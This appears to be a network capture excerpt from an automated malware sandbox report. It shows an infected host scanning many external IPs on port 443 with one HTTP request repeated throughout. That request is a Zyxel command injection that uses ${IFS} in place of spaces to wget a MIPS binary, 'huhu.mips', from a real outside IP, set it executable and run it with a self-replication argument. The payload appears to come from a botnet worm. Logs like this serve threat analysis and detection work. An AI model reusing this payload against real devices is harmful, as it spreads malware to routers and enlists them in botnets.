                                                  Jan 19, 2024 18:23:55.038588047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4261192.168.2.134919677.210.239.98443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.038625956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4262192.168.2.135454670.187.121.147443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.038660049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4263192.168.2.1358088132.3.20.10443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.038686037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4264192.168.2.1334638114.109.156.158443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.038741112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4265192.168.2.1355360221.112.23.175443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.038764954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4266192.168.2.134072899.166.173.207443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.038969994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4267192.168.2.1360284123.93.140.226443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.038990021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4268192.168.2.134560073.211.173.89443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.039021969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4269192.168.2.1350670102.202.168.101443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.039060116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4270192.168.2.133750886.20.88.186443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.039097071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4271192.168.2.1343878161.107.197.171443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.039150953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4272192.168.2.1356504183.27.156.72443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.039180994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4273192.168.2.1333412136.164.72.72443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.039236069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4274192.168.2.1337004159.176.65.189443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.039273024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4275192.168.2.1338346203.209.8.250443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.039320946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4276192.168.2.135719065.139.155.251443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.039345980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4277192.168.2.1346146207.131.215.28443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.039391041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4278192.168.2.1359496196.0.155.0443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.039413929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4279192.168.2.1335544129.83.144.161443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.039479017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4280192.168.2.1355766166.58.8.144443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.039510965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4281192.168.2.133350412.44.246.101443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.039547920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4282192.168.2.1353232180.36.21.74443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.039580107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4283192.168.2.135358820.164.3.22443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.039637089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4284192.168.2.1354320195.226.212.253443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.039664984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4285192.168.2.1359102167.233.44.47443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.039711952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4286192.168.2.1357504153.237.15.247443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.039737940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4287192.168.2.1337112120.60.77.67443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.039784908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4288192.168.2.1358378203.123.98.24443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.039819002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4289192.168.2.135920084.190.198.29443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.039874077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4290192.168.2.135738019.150.63.208443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.039911032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4291192.168.2.134428461.73.178.105443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.039946079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4292192.168.2.134565625.247.105.239443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.040000916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4293192.168.2.135920434.129.38.66443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.040028095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4294192.168.2.1348630195.58.180.226443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.040060997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4295192.168.2.1347010123.21.194.31443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.040097952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4296192.168.2.1359134112.217.55.164443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.040148973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4297192.168.2.134389078.201.8.57443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.040203094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4298192.168.2.1355630191.44.67.101443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.040230036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4299192.168.2.13450465.32.201.12443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.040272951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4300192.168.2.1345762206.75.71.172443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.040324926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4301192.168.2.1346798199.63.88.165443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.040368080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4302192.168.2.1334834114.103.53.221443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.040383101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4303192.168.2.1353216194.40.1.13443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.040435076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4304192.168.2.1346310110.230.11.209443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.040472984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4305192.168.2.136014266.193.28.251443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.040519953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4306192.168.2.136040645.41.137.157443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.040539026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4307192.168.2.133457624.130.70.17443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.040577888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4308192.168.2.135081244.25.175.42443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.040647984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4309192.168.2.1351834115.141.114.75443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.040683031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4310192.168.2.1337140189.126.160.123443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.040721893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4311192.168.2.133758882.2.177.16443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.040751934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4312192.168.2.13329008.89.95.255443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.040781021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4313192.168.2.134442018.72.166.116443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.040813923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4314192.168.2.1346214155.54.24.184443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.040838003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4315192.168.2.1353784195.124.189.174443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.040868998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4316192.168.2.1352222197.147.177.126443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.040910006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4317192.168.2.135206218.251.105.239443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.040942907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4318192.168.2.1352128175.156.8.73443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.041002035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4319192.168.2.134711045.40.232.9443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.041035891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4320192.168.2.1359042160.18.172.232443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.054109097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4321192.168.2.1352514135.118.88.249443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.054150105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4322192.168.2.1334222162.247.191.87443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.054197073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4323192.168.2.134310484.218.124.10443
                                                  TimestampBytes transferredDirectionData
